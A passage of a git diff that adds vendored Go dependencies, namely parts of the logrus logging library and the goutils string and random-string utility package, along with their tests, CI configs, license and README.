&TextFormatter{DisableColors: true} + + ts := time.Now() + + testCases := []struct { + value interface{} + expected string + }{ + {ts, fmt.Sprintf("\"%s\"", ts.String())}, + {errors.New("error: something went wrong"), "\"error: something went wrong\""}, + } + + for _, tc := range testCases { + b, _ := tf.Format(WithField("test", tc.value)) + if !bytes.Contains(b, []byte(tc.expected)) { + t.Errorf("escaping expected for %q (result was %q instead of %q)", tc.value, string(b), tc.expected) + } + } +} + +func TestTimestampFormat(t *testing.T) { + checkTimeStr := func(format string) { + customFormatter := &TextFormatter{DisableColors: true, TimestampFormat: format} + customStr, _ := customFormatter.Format(WithField("test", "test")) + timeStart := bytes.Index(customStr, ([]byte)("time=")) + timeEnd := bytes.Index(customStr, ([]byte)("level=")) + timeStr := customStr[timeStart+5+len("\"") : timeEnd-1-len("\"")] + if format == "" { + format = time.RFC3339 + } + _, e := time.Parse(format, (string)(timeStr)) + if e != nil { + t.Errorf("time string \"%s\" did not match provided time format \"%s\": %s", timeStr, format, e) + } + } + + checkTimeStr("2006-01-02T15:04:05.000000000Z07:00") + checkTimeStr("Mon Jan _2 15:04:05 2006") + checkTimeStr("") +} + +func TestDisableTimestampWithColoredOutput(t *testing.T) { + tf := &TextFormatter{DisableTimestamp: true, ForceColors: true} + + b, _ := tf.Format(WithField("test", "test")) + if strings.Contains(string(b), "[0000]") { + t.Error("timestamp not expected when DisableTimestamp is true") + } +} + +// TODO add tests for sorting etc., this requires a parser for the text +// formatter output. diff --git a/vendor/github.com/Sirupsen/logrus/writer.go b/vendor/github.com/Sirupsen/logrus/writer.go new file mode 100644 index 0000000000..7bdebedc60 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/writer.go @@ -0,0 +1,62 @@ +package logrus + +import ( + "bufio" + "io" + "runtime" +) + +func (logger *Logger) Writer() *io.PipeWriter { + return logger.WriterLevel(InfoLevel) +} + +func (logger *Logger) WriterLevel(level Level) *io.PipeWriter { + return NewEntry(logger).WriterLevel(level) +} + +func (entry *Entry) Writer() *io.PipeWriter { + return entry.WriterLevel(InfoLevel) +} + +func (entry *Entry) WriterLevel(level Level) *io.PipeWriter { + reader, writer := io.Pipe() + + var printFunc func(args ...interface{}) + + switch level { + case DebugLevel: + printFunc = entry.Debug + case InfoLevel: + printFunc = entry.Info + case WarnLevel: + printFunc = entry.Warn + case ErrorLevel: + printFunc = entry.Error + case FatalLevel: + printFunc = entry.Fatal + case PanicLevel: + printFunc = entry.Panic + default: + printFunc = entry.Print + } + + go entry.writerScanner(reader, printFunc) + runtime.SetFinalizer(writer, writerFinalizer) + + return writer +} + +func (entry *Entry) writerScanner(reader *io.PipeReader, printFunc func(args ...interface{})) { + scanner := bufio.NewScanner(reader) + for scanner.Scan() { + printFunc(scanner.Text()) + } + if err := scanner.Err(); err != nil { + entry.Errorf("Error while reading from Writer: %s", err) + } + reader.Close() +} + +func writerFinalizer(writer *io.PipeWriter) { + writer.Close() +} diff --git a/vendor/github.com/aokoli/goutils/.travis.yml b/vendor/github.com/aokoli/goutils/.travis.yml new file mode 100644 index 0000000000..4025e01ec4 --- /dev/null +++ b/vendor/github.com/aokoli/goutils/.travis.yml @@ -0,0 +1,18 @@ +language: go + +go: + - 1.6 + - 1.7 + - 1.8 + - tip + +script: + - go test -v + +notifications: + webhooks: + urls: + - https://webhooks.gitter.im/e/06e3328629952dabe3e0 + on_success: change # options: [always|never|change] default: always + on_failure: always # options: [always|never|change] default: always + on_start: never # options: [always|never|change] default: always diff --git a/vendor/github.com/aokoli/goutils/CHANGELOG.md b/vendor/github.com/aokoli/goutils/CHANGELOG.md new file mode 100644 index 0000000000..d700ec47f2 --- /dev/null +++ b/vendor/github.com/aokoli/goutils/CHANGELOG.md @@ -0,0 +1,8 @@ +# 1.0.1 (2017-05-31) + +## Fixed +- #21: Fix generation of alphanumeric strings (thanks @dbarranco) + +# 1.0.0 (2014-04-30) + +- Initial release. diff --git a/vendor/github.com/aokoli/goutils/LICENSE.txt b/vendor/github.com/aokoli/goutils/LICENSE.txt new file mode 100644 index 0000000000..d645695673 --- /dev/null +++ b/vendor/github.com/aokoli/goutils/LICENSE.txt @@ -0,0 +1,202 @@ + + Apache License + Version 2.0, January 2004 + http://www.apache.org/licenses/ + + TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + + 1. Definitions. + + "License" shall mean the terms and conditions for use, reproduction, + and distribution as defined by Sections 1 through 9 of this document. + + "Licensor" shall mean the copyright owner or entity authorized by + the copyright owner that is granting the License. + + "Legal Entity" shall mean the union of the acting entity and all + other entities that control, are controlled by, or are under common + control with that entity. For the purposes of this definition, + "control" means (i) the power, direct or indirect, to cause the + direction or management of such entity, whether by contract or + otherwise, or (ii) ownership of fifty percent (50%) or more of the + outstanding shares, or (iii) beneficial ownership of such entity. + + "You" (or "Your") shall mean an individual or Legal Entity + exercising permissions granted by this License. + + "Source" form shall mean the preferred form for making modifications, + including but not limited to software source code, documentation + source, and configuration files. + + "Object" form shall mean any form resulting from mechanical + transformation or translation of a Source form, including but + not limited to compiled object code, generated documentation, + and conversions to other media types. + + "Work" shall mean the work of authorship, whether in Source or + Object form, made available under the License, as indicated by a + copyright notice that is included in or attached to the work + (an example is provided in the Appendix below). + + "Derivative Works" shall mean any work, whether in Source or Object + form, that is based on (or derived from) the Work and for which the + editorial revisions, annotations, elaborations, or other modifications + represent, as a whole, an original work of authorship. For the purposes + of this License, Derivative Works shall not include works that remain + separable from, or merely link (or bind by name) to the interfaces of, + the Work and Derivative Works thereof. + + "Contribution" shall mean any work of authorship, including + the original version of the Work and any modifications or additions + to that Work or Derivative Works thereof, that is intentionally + submitted to Licensor for inclusion in the Work by the copyright owner + or by an individual or Legal Entity authorized to submit on behalf of + the copyright owner. For the purposes of this definition, "submitted" + means any form of electronic, verbal, or written communication sent + to the Licensor or its representatives, including but not limited to + communication on electronic mailing lists, source code control systems, + and issue tracking systems that are managed by, or on behalf of, the + Licensor for the purpose of discussing and improving the Work, but + excluding communication that is conspicuously marked or otherwise + designated in writing by the copyright owner as "Not a Contribution." + + "Contributor" shall mean Licensor and any individual or Legal Entity + on behalf of whom a Contribution has been received by Licensor and + subsequently incorporated within the Work. + + 2. Grant of Copyright License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + copyright license to reproduce, prepare Derivative Works of, + publicly display, publicly perform, sublicense, and distribute the + Work and such Derivative Works in Source or Object form. + + 3. Grant of Patent License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + (except as stated in this section) patent license to make, have made, + use, offer to sell, sell, import, and otherwise transfer the Work, + where such license applies only to those patent claims licensable + by such Contributor that are necessarily infringed by their + Contribution(s) alone or by combination of their Contribution(s) + with the Work to which such Contribution(s) was submitted. If You + institute patent litigation against any entity (including a + cross-claim or counterclaim in a lawsuit) alleging that the Work + or a Contribution incorporated within the Work constitutes direct + or contributory patent infringement, then any patent licenses + granted to You under this License for that Work shall terminate + as of the date such litigation is filed. + + 4. Redistribution. You may reproduce and distribute copies of the + Work or Derivative Works thereof in any medium, with or without + modifications, and in Source or Object form, provided that You + meet the following conditions: + + (a) You must give any other recipients of the Work or + Derivative Works a copy of this License; and + + (b) You must cause any modified files to carry prominent notices + stating that You changed the files; and + + (c) You must retain, in the Source form of any Derivative Works + that You distribute, all copyright, patent, trademark, and + attribution notices from the Source form of the Work, + excluding those notices that do not pertain to any part of + the Derivative Works; and + + (d) If the Work includes a "NOTICE" text file as part of its + distribution, then any Derivative Works that You distribute must + include a readable copy of the attribution notices contained + within such NOTICE file, excluding those notices that do not + pertain to any part of the Derivative Works, in at least one + of the following places: within a NOTICE text file distributed + as part of the Derivative Works; within the Source form or + documentation, if provided along with the Derivative Works; or, + within a display generated by the Derivative Works, if and + wherever such third-party notices normally appear. The contents + of the NOTICE file are for informational purposes only and + do not modify the License. You may add Your own attribution + notices within Derivative Works that You distribute, alongside + or as an addendum to the NOTICE text from the Work, provided + that such additional attribution notices cannot be construed + as modifying the License. + + You may add Your own copyright statement to Your modifications and + may provide additional or different license terms and conditions + for use, reproduction, or distribution of Your modifications, or + for any such Derivative Works as a whole, provided Your use, + reproduction, and distribution of the Work otherwise complies with + the conditions stated in this License. + + 5. Submission of Contributions. Unless You explicitly state otherwise, + any Contribution intentionally submitted for inclusion in the Work + by You to the Licensor shall be under the terms and conditions of + this License, without any additional terms or conditions. + Notwithstanding the above, nothing herein shall supersede or modify + the terms of any separate license agreement you may have executed + with Licensor regarding such Contributions. + + 6. Trademarks. This License does not grant permission to use the trade + names, trademarks, service marks, or product names of the Licensor, + except as required for reasonable and customary use in describing the + origin of the Work and reproducing the content of the NOTICE file. + + 7. Disclaimer of Warranty. Unless required by applicable law or + agreed to in writing, Licensor provides the Work (and each + Contributor provides its Contributions) on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or + implied, including, without limitation, any warranties or conditions + of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A + PARTICULAR PURPOSE. You are solely responsible for determining the + appropriateness of using or redistributing the Work and assume any + risks associated with Your exercise of permissions under this License. + + 8. Limitation of Liability. In no event and under no legal theory, + whether in tort (including negligence), contract, or otherwise, + unless required by applicable law (such as deliberate and grossly + negligent acts) or agreed to in writing, shall any Contributor be + liable to You for damages, including any direct, indirect, special, + incidental, or consequential damages of any character arising as a + result of this License or out of the use or inability to use the + Work (including but not limited to damages for loss of goodwill, + work stoppage, computer failure or malfunction, or any and all + other commercial damages or losses), even if such Contributor + has been advised of the possibility of such damages. + + 9. Accepting Warranty or Additional Liability. While redistributing + the Work or Derivative Works thereof, You may choose to offer, + and charge a fee for, acceptance of support, warranty, indemnity, + or other liability obligations and/or rights consistent with this + License. However, in accepting such obligations, You may act only + on Your own behalf and on Your sole responsibility, not on behalf + of any other Contributor, and only if You agree to indemnify, + defend, and hold each Contributor harmless for any liability + incurred by, or claims asserted against, such Contributor by reason + of your accepting any such warranty or additional liability. + + END OF TERMS AND CONDITIONS + + APPENDIX: How to apply the Apache License to your work. + + To apply the Apache License to your work, attach the following + boilerplate notice, with the fields enclosed by brackets "[]" + replaced with your own identifying information. (Don't include + the brackets!) The text should be enclosed in the appropriate + comment syntax for the file format. We also recommend that a + file or class name and description of purpose be included on the + same "printed page" as the copyright notice for easier + identification within third-party archives. + + Copyright [yyyy] [name of copyright owner] + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. diff --git a/vendor/github.com/aokoli/goutils/README.md b/vendor/github.com/aokoli/goutils/README.md new file mode 100644 index 0000000000..163ffe72a8 --- /dev/null +++ b/vendor/github.com/aokoli/goutils/README.md @@ -0,0 +1,70 @@ +GoUtils +=========== +[![Stability: Maintenance](https://masterminds.github.io/stability/maintenance.svg)](https://masterminds.github.io/stability/maintenance.html) +[![GoDoc](https://godoc.org/github.com/Masterminds/goutils?status.png)](https://godoc.org/github.com/Masterminds/goutils) [![Build Status](https://travis-ci.org/Masterminds/goutils.svg?branch=master)](https://travis-ci.org/Masterminds/goutils) [![Build status](https://ci.appveyor.com/api/projects/status/sc2b1ew0m7f0aiju?svg=true)](https://ci.appveyor.com/project/mattfarina/goutils) + + +GoUtils provides users with utility functions to manipulate strings in various ways. It is a Go implementation of some +string manipulation libraries of Java Apache Commons. GoUtils includes the following Java Apache Commons classes: +* WordUtils +* RandomStringUtils +* StringUtils (partial implementation) + +## Installation +If you have Go set up on your system, from the GOPATH directory within the command line/terminal, enter this: + + go get github.com/Masterminds/goutils + +If you do not have Go set up on your system, please follow the [Go installation directions from the documenation](http://golang.org/doc/install), and then follow the instructions above to install GoUtils. + + +## Documentation +GoUtils doc is available here: [![GoDoc](https://godoc.org/github.com/Masterminds/goutils?status.png)](https://godoc.org/github.com/Masterminds/goutils) + + +## Usage +The code snippets below show examples of how to use GoUtils. Some functions return errors while others do not. The first instance below, which does not return an error, is the `Initials` function (located within the `wordutils.go` file). + + package main + + import ( + "fmt" + "github.com/Masterminds/goutils" + ) + + func main() { + + // EXAMPLE 1: A goutils function which returns no errors + fmt.Println (goutils.Initials("John Doe Foo")) // Prints out "JDF" + + } +Some functions return errors mainly due to illegal arguements used as parameters. The code example below illustrates how to deal with function that returns an error. In this instance, the function is the `Random` function (located within the `randomstringutils.go` file). + + package main + + import ( + "fmt" + "github.com/Masterminds/goutils" + ) + + func main() { + + // EXAMPLE 2: A goutils function which returns an error + rand1, err1 := goutils.Random (-1, 0, 0, true, true) + + if err1 != nil { + fmt.Println(err1) // Prints out error message because -1 was entered as the first parameter in goutils.Random(...) + } else { + fmt.Println(rand1) + } + + } + +## License +GoUtils is licensed under the Apache License, Version 2.0. Please check the LICENSE.txt file or visit http://www.apache.org/licenses/LICENSE-2.0 for a copy of the license. + +## Issue Reporting +Make suggestions or report issues using the Git issue tracker: https://github.com/Masterminds/goutils/issues + +## Website +* [GoUtils webpage](http://Masterminds.github.io/goutils/) diff --git a/vendor/github.com/aokoli/goutils/appveyor.yml b/vendor/github.com/aokoli/goutils/appveyor.yml new file mode 100644 index 0000000000..657564a847 --- /dev/null +++ b/vendor/github.com/aokoli/goutils/appveyor.yml @@ -0,0 +1,21 @@ +version: build-{build}.{branch} + +clone_folder: C:\gopath\src\github.com\Masterminds\goutils +shallow_clone: true + +environment: + GOPATH: C:\gopath + +platform: + - x64 + +build: off + +install: + - go version + - go env + +test_script: + - go test -v + +deploy: off diff --git a/vendor/github.com/aokoli/goutils/randomstringutils.go b/vendor/github.com/aokoli/goutils/randomstringutils.go new file mode 100644 index 0000000000..1364e0cafd --- /dev/null +++ b/vendor/github.com/aokoli/goutils/randomstringutils.go @@ -0,0 +1,268 @@ +/* +Copyright 2014 Alexander Okoli + +Licensed under the Apache License, Version 2.0 (the "License"); +you may not use this file except in compliance with the License. +You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + +Unless required by applicable law or agreed to in writing, software +distributed under the License is distributed on an "AS IS" BASIS, +WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +See the License for the specific language governing permissions and +limitations under the License. +*/ + +package goutils + +import ( + "fmt" + "math" + "math/rand" + "regexp" + "time" + "unicode" +) + +// RANDOM provides the time-based seed used to generate random numbers +var RANDOM = rand.New(rand.NewSource(time.Now().UnixNano())) + +/* +RandomNonAlphaNumeric creates a random string whose length is the number of characters specified. +Characters will be chosen from the set of all characters (ASCII/Unicode values between 0 to 2,147,483,647 (math.MaxInt32)). + +Parameter: + count - the length of random string to create + +Returns: + string - the random string + error - an error stemming from an invalid parameter within underlying function, RandomSeed(...) +*/ +func RandomNonAlphaNumeric(count int) (string, error) { + return RandomAlphaNumericCustom(count, false, false) +} + +/* +RandomAscii creates a random string whose length is the number of characters specified. +Characters will be chosen from the set of characters whose ASCII value is between 32 and 126 (inclusive). + +Parameter: + count - the length of random string to create + +Returns: + string - the random string + error - an error stemming from an invalid parameter within underlying function, RandomSeed(...) +*/ +func RandomAscii(count int) (string, error) { + return Random(count, 32, 127, false, false) +} + +/* +RandomNumeric creates a random string whose length is the number of characters specified. +Characters will be chosen from the set of numeric characters. + +Parameter: + count - the length of random string to create + +Returns: + string - the random string + error - an error stemming from an invalid parameter within underlying function, RandomSeed(...) +*/ +func RandomNumeric(count int) (string, error) { + return Random(count, 0, 0, false, true) +} + +/* +RandomAlphabetic creates a random string whose length is the number of characters specified. +Characters will be chosen from the set of alpha-numeric characters as indicated by the arguments. + +Parameters: + count - the length of random string to create + letters - if true, generated string may include alphabetic characters + numbers - if true, generated string may include numeric characters + +Returns: + string - the random string + error - an error stemming from an invalid parameter within underlying function, RandomSeed(...) +*/ +func RandomAlphabetic(count int) (string, error) { + return Random(count, 0, 0, true, false) +} + +/* +RandomAlphaNumeric creates a random string whose length is the number of characters specified. +Characters will be chosen from the set of alpha-numeric characters. + +Parameter: + count - the length of random string to create + +Returns: + string - the random string + error - an error stemming from an invalid parameter within underlying function, RandomSeed(...) +*/ +func RandomAlphaNumeric(count int) (string, error) { + RandomString, err := Random(count, 0, 0, true, true) + if err != nil { + return "", fmt.Errorf("Error: %s", err) + } + match, err := regexp.MatchString("([0-9]+)", RandomString) + if err != nil { + panic(err) + } + + if !match { + //Get the position between 0 and the length of the string-1 to insert a random number + position := rand.Intn(count) + //Insert a random number between [0-9] in the position + RandomString = RandomString[:position] + string('0'+rand.Intn(10)) + RandomString[position+1:] + return RandomString, err + } + return RandomString, err + +} + +/* +RandomAlphaNumericCustom creates a random string whose length is the number of characters specified. +Characters will be chosen from the set of alpha-numeric characters as indicated by the arguments. + +Parameters: + count - the length of random string to create + letters - if true, generated string may include alphabetic characters + numbers - if true, generated string may include numeric characters + +Returns: + string - the random string + error - an error stemming from an invalid parameter within underlying function, RandomSeed(...) +*/ +func RandomAlphaNumericCustom(count int, letters bool, numbers bool) (string, error) { + return Random(count, 0, 0, letters, numbers) +} + +/* +Random creates a random string based on a variety of options, using default source of randomness. +This method has exactly the same semantics as RandomSeed(int, int, int, bool, bool, []char, *rand.Rand), but +instead of using an externally supplied source of randomness, it uses the internal *rand.Rand instance. + +Parameters: + count - the length of random string to create + start - the position in set of chars (ASCII/Unicode int) to start at + end - the position in set of chars (ASCII/Unicode int) to end before + letters - if true, generated string may include alphabetic characters + numbers - if true, generated string may include numeric characters + chars - the set of chars to choose randoms from. If nil, then it will use the set of all chars. + +Returns: + string - the random string + error - an error stemming from an invalid parameter within underlying function, RandomSeed(...) +*/ +func Random(count int, start int, end int, letters bool, numbers bool, chars ...rune) (string, error) { + return RandomSeed(count, start, end, letters, numbers, chars, RANDOM) +} + +/* +RandomSeed creates a random string based on a variety of options, using supplied source of randomness. +If the parameters start and end are both 0, start and end are set to ' ' and 'z', the ASCII printable characters, will be used, +unless letters and numbers are both false, in which case, start and end are set to 0 and math.MaxInt32, respectively. +If chars is not nil, characters stored in chars that are between start and end are chosen. +This method accepts a user-supplied *rand.Rand instance to use as a source of randomness. By seeding a single *rand.Rand instance +with a fixed seed and using it for each call, the same random sequence of strings can be generated repeatedly and predictably. + +Parameters: + count - the length of random string to create + start - the position in set of chars (ASCII/Unicode decimals) to start at + end - the position in set of chars (ASCII/Unicode decimals) to end before + letters - if true, generated string may include alphabetic characters + numbers - if true, generated string may include numeric characters + chars - the set of chars to choose randoms from. If nil, then it will use the set of all chars. + random - a source of randomness. + +Returns: + string - the random string + error - an error stemming from invalid parameters: if count < 0; or the provided chars array is empty; or end <= start; or end > len(chars) +*/ +func RandomSeed(count int, start int, end int, letters bool, numbers bool, chars []rune, random *rand.Rand) (string, error) { + + if count == 0 { + return "", nil + } else if count < 0 { + err := fmt.Errorf("randomstringutils illegal argument: Requested random string length %v is less than 0.", count) // equiv to err := errors.New("...") + return "", err + } + if chars != nil && len(chars) == 0 { + err := fmt.Errorf("randomstringutils illegal argument: The chars array must not be empty") + return "", err + } + + if start == 0 && end == 0 { + if chars != nil { + end = len(chars) + } else { + if !letters && !numbers { + end = math.MaxInt32 + } else { + end = 'z' + 1 + start = ' ' + } + } + } else { + if end <= start { + err := fmt.Errorf("randomstringutils illegal argument: Parameter end (%v) must be greater than start (%v)", end, start) + return "", err + } + + if chars != nil && end > len(chars) { + err := fmt.Errorf("randomstringutils illegal argument: Parameter end (%v) cannot be greater than len(chars) (%v)", end, len(chars)) + return "", err + } + } + + buffer := make([]rune, count) + gap := end - start + + // high-surrogates range, (\uD800-\uDBFF) = 55296 - 56319 + // low-surrogates range, (\uDC00-\uDFFF) = 56320 - 57343 + + for count != 0 { + count-- + var ch rune + if chars == nil { + ch = rune(random.Intn(gap) + start) + } else { + ch = chars[random.Intn(gap)+start] + } + + if letters && unicode.IsLetter(ch) || numbers && unicode.IsDigit(ch) || !letters && !numbers { + if ch >= 56320 && ch <= 57343 { // low surrogate range + if count == 0 { + count++ + } else { + // Insert low surrogate + buffer[count] = ch + count-- + // Insert high surrogate + buffer[count] = rune(55296 + random.Intn(128)) + } + } else if ch >= 55296 && ch <= 56191 { // High surrogates range (Partial) + if count == 0 { + count++ + } else { + // Insert low surrogate + buffer[count] = rune(56320 + random.Intn(128)) + count-- + // Insert high surrogate + buffer[count] = ch + } + } else if ch >= 56192 && ch <= 56319 { + // private high surrogate, skip it + count++ + } else { + // not one of the surrogates* + buffer[count] = ch + } + } else { + count++ + } + } + return string(buffer), nil +} diff --git a/vendor/github.com/aokoli/goutils/randomstringutils_test.go b/vendor/github.com/aokoli/goutils/randomstringutils_test.go new file mode 100644 index 0000000000..b990654a1c --- /dev/null +++ b/vendor/github.com/aokoli/goutils/randomstringutils_test.go @@ -0,0 +1,78 @@ +package goutils + +import ( + "fmt" + "math/rand" + "testing" +) + +// ****************************** TESTS ******************************************** + +func TestRandomSeed(t *testing.T) { + + // count, start, end, letters, numbers := 5, 0, 0, true, true + random := rand.New(rand.NewSource(10)) + out := "3ip9v" + + // Test 1: Simulating RandomAlphaNumeric(count int) + if x, _ := RandomSeed(5, 0, 0, true, true, nil, random); x != out { + t.Errorf("RandomSeed(%v, %v, %v, %v, %v, %v, %v) = %v, want %v", 5, 0, 0, true, true, nil, random, x, out) + } + + // Test 2: Simulating RandomAlphabetic(count int) + out = "MBrbj" + + if x, _ := RandomSeed(5, 0, 0, true, false, nil, random); x != out { + t.Errorf("RandomSeed(%v, %v, %v, %v, %v, %v, %v) = %v, want %v", 5, 0, 0, true, false, nil, random, x, out) + } + + // Test 3: Simulating RandomNumeric(count int) + out = "88935" + + if x, _ := RandomSeed(5, 0, 0, false, true, nil, random); x != out { + t.Errorf("RandomSeed(%v, %v, %v, %v, %v, %v, %v) = %v, want %v", 5, 0, 0, false, true, nil, random, x, out) + } + + // Test 4: Simulating RandomAscii(count int) + out = "H_I;E" + + if x, _ := RandomSeed(5, 32, 127, false, false, nil, random); x != out { + t.Errorf("RandomSeed(%v, %v, %v, %v, %v, %v, %v) = %v, want %v", 5, 32, 127, false, false, nil, random, x, out) + } + + // Test 5: Simulating RandomSeed(...) with custom chars + chars := []rune{'1', '2', '3', 'a', 'b', 'c'} + out = "2b2ca" + + if x, _ := RandomSeed(5, 0, 0, false, false, chars, random); x != out { + t.Errorf("RandomSeed(%v, %v, %v, %v, %v, %v, %v) = %v, want %v", 5, 0, 0, false, false, chars, random, x, out) + } + +} + +// ****************************** EXAMPLES ******************************************** + +func ExampleRandomSeed() { + + var seed int64 = 10 // If you change this seed #, the random sequence below will change + random := rand.New(rand.NewSource(seed)) + chars := []rune{'1', '2', '3', 'a', 'b', 'c'} + + rand1, _ := RandomSeed(5, 0, 0, true, true, nil, random) // RandomAlphaNumeric (Alphabets and numbers possible) + rand2, _ := RandomSeed(5, 0, 0, true, false, nil, random) // RandomAlphabetic (Only alphabets) + rand3, _ := RandomSeed(5, 0, 0, false, true, nil, random) // RandomNumeric (Only numbers) + rand4, _ := RandomSeed(5, 32, 127, false, false, nil, random) // RandomAscii (Alphabets, numbers, and other ASCII chars) + rand5, _ := RandomSeed(5, 0, 0, true, true, chars, random) // RandomSeed with custom characters + + fmt.Println(rand1) + fmt.Println(rand2) + fmt.Println(rand3) + fmt.Println(rand4) + fmt.Println(rand5) + // Output: + // 3ip9v + // MBrbj + // 88935 + // H_I;E + // 2b2ca +} diff --git a/vendor/github.com/aokoli/goutils/stringutils.go b/vendor/github.com/aokoli/goutils/stringutils.go new file mode 100644 index 0000000000..5037c4516b --- /dev/null +++ b/vendor/github.com/aokoli/goutils/stringutils.go @@ -0,0 +1,224 @@ +/* +Copyright 2014 Alexander Okoli + +Licensed under the Apache License, Version 2.0 (the "License"); +you may not use this file except in compliance with the License. +You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + +Unless required by applicable law or agreed to in writing, software +distributed under the License is distributed on an "AS IS" BASIS, +WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +See the License for the specific language governing permissions and +limitations under the License. +*/ + +package goutils + +import ( + "bytes" + "fmt" + "strings" + "unicode" +) + +// Typically returned by functions where a searched item cannot be found +const INDEX_NOT_FOUND = -1 + +/* +Abbreviate abbreviates a string using ellipses. This will turn the string "Now is the time for all good men" into "Now is the time for..." + +Specifically, the algorithm is as follows: + + - If str is less than maxWidth characters long, return it. + - Else abbreviate it to (str[0:maxWidth - 3] + "..."). + - If maxWidth is less than 4, return an illegal argument error. + - In no case will it return a string of length greater than maxWidth. + +Parameters: + str - the string to check + maxWidth - maximum length of result string, must be at least 4 + +Returns: + string - abbreviated string + error - if the width is too small +*/ +func Abbreviate(str string, maxWidth int) (string, error) { + return AbbreviateFull(str, 0, maxWidth) +} + +/* +AbbreviateFull abbreviates a string using ellipses. This will turn the string "Now is the time for all good men" into "...is the time for..." +This function works like Abbreviate(string, int), but allows you to specify a "left edge" offset. Note that this left edge is not +necessarily going to be the leftmost character in the result, or the first character following the ellipses, but it will appear +somewhere in the result. +In no case will it return a string of length greater than maxWidth. + +Parameters: + str - the string to check + offset - left edge of source string + maxWidth - maximum length of result string, must be at least 4 + +Returns: + string - abbreviated string + error - if the width is too small +*/ +func AbbreviateFull(str string, offset int, maxWidth int) (string, error) { + if str == "" { + return "", nil + } + if maxWidth < 4 { + err := fmt.Errorf("stringutils illegal argument: Minimum abbreviation width is 4") + return "", err + } + if len(str) <= maxWidth { + return str, nil + } + if offset > len(str) { + offset = len(str) + } + if len(str)-offset < (maxWidth - 3) { // 15 - 5 < 10 - 3 = 10 < 7 + offset = len(str) - (maxWidth - 3) + } + abrevMarker := "..." + if offset <= 4 { + return str[0:maxWidth-3] + abrevMarker, nil // str.substring(0, maxWidth - 3) + abrevMarker; + } + if maxWidth < 7 { + err := fmt.Errorf("stringutils illegal argument: Minimum abbreviation width with offset is 7") + return "", err + } + if (offset + maxWidth - 3) < len(str) { // 5 + (10-3) < 15 = 12 < 15 + abrevStr, _ := Abbreviate(str[offset:len(str)], (maxWidth - 3)) + return abrevMarker + abrevStr, nil // abrevMarker + abbreviate(str.substring(offset), maxWidth - 3); + } + return abrevMarker + str[(len(str)-(maxWidth-3)):len(str)], nil // abrevMarker + str.substring(str.length() - (maxWidth - 3)); +} + +/* +DeleteWhiteSpace deletes all whitespaces from a string as defined by unicode.IsSpace(rune). +It returns the string without whitespaces. + +Parameter: + str - the string to delete whitespace from, may be nil + +Returns: + the string without whitespaces +*/ +func DeleteWhiteSpace(str string) string { + if str == "" { + return str + } + sz := len(str) + var chs bytes.Buffer + count := 0 + for i := 0; i < sz; i++ { + ch := rune(str[i]) + if !unicode.IsSpace(ch) { + chs.WriteRune(ch) + count++ + } + } + if count == sz { + return str + } + return chs.String() +} + +/* +IndexOfDifference compares two strings, and returns the index at which the strings begin to differ. + +Parameters: + str1 - the first string + str2 - the second string + +Returns: + the index where str1 and str2 begin to differ; -1 if they are equal +*/ +func IndexOfDifference(str1 string, str2 string) int { + if str1 == str2 { + return INDEX_NOT_FOUND + } + if IsEmpty(str1) || IsEmpty(str2) { + return 0 + } + var i int + for i = 0; i < len(str1) && i < len(str2); i++ { + if rune(str1[i]) != rune(str2[i]) { + break + } + } + if i < len(str2) || i < len(str1) { + return i + } + return INDEX_NOT_FOUND +} + +/* +IsBlank checks if a string is whitespace or empty (""). Observe the following behavior: + + goutils.IsBlank("") = true + goutils.IsBlank(" ") = true + goutils.IsBlank("bob") = false + goutils.IsBlank(" bob ") = false + +Parameter: + str - the string to check + +Returns: + true - if the string is whitespace or empty ("") +*/ +func IsBlank(str string) bool { + strLen := len(str) + if str == "" || strLen == 0 { + return true + } + for i := 0; i < strLen; i++ { + if unicode.IsSpace(rune(str[i])) == false { + return false + } + } + return true +} + +/* +IndexOf returns the index of the first instance of sub in str, with the search beginning from the +index start point specified. -1 is returned if sub is not present in str. + +An empty string ("") will return -1 (INDEX_NOT_FOUND). A negative start position is treated as zero. +A start position greater than the string length returns -1. + +Parameters: + str - the string to check + sub - the substring to find + start - the start position; negative treated as zero + +Returns: + the first index where the sub string was found (always >= start) +*/ +func IndexOf(str string, sub string, start int) int { + + if start < 0 { + start = 0 + } + + if len(str) < start { + return INDEX_NOT_FOUND + } + + if IsEmpty(str) || IsEmpty(sub) { + return INDEX_NOT_FOUND + } + + partialIndex := strings.Index(str[start:len(str)], sub) + if partialIndex == -1 { + return INDEX_NOT_FOUND + } + return partialIndex + start +} + +// IsEmpty checks if a string is empty (""). Returns true if empty, and false otherwise. +func IsEmpty(str string) bool { + return len(str) == 0 +} diff --git a/vendor/github.com/aokoli/goutils/stringutils_test.go b/vendor/github.com/aokoli/goutils/stringutils_test.go new file mode 100644 index 0000000000..dae93132a0 --- /dev/null +++ b/vendor/github.com/aokoli/goutils/stringutils_test.go @@ -0,0 +1,309 @@ +package goutils + +import ( + "fmt" + "testing" +) + +// ****************************** TESTS ******************************************** + +func TestAbbreviate(t *testing.T) { + + // Test 1 + in := "abcdefg" + out := "abc..." + maxWidth := 6 + + if x, _ := Abbreviate(in, maxWidth); x != out { + t.Errorf("Abbreviate(%v, %v) = %v, want %v", in, maxWidth, x, out) + } + + // Test 2 + out = "abcdefg" + maxWidth = 7 + + if x, _ := Abbreviate(in, maxWidth); x != out { + t.Errorf("Abbreviate(%v, %v) = %v, want %v", in, maxWidth, x, out) + } + + // Test 3 + out = "a..." + maxWidth = 4 + + if x, _ := Abbreviate(in, maxWidth); x != out { + t.Errorf("Abbreviate(%v, 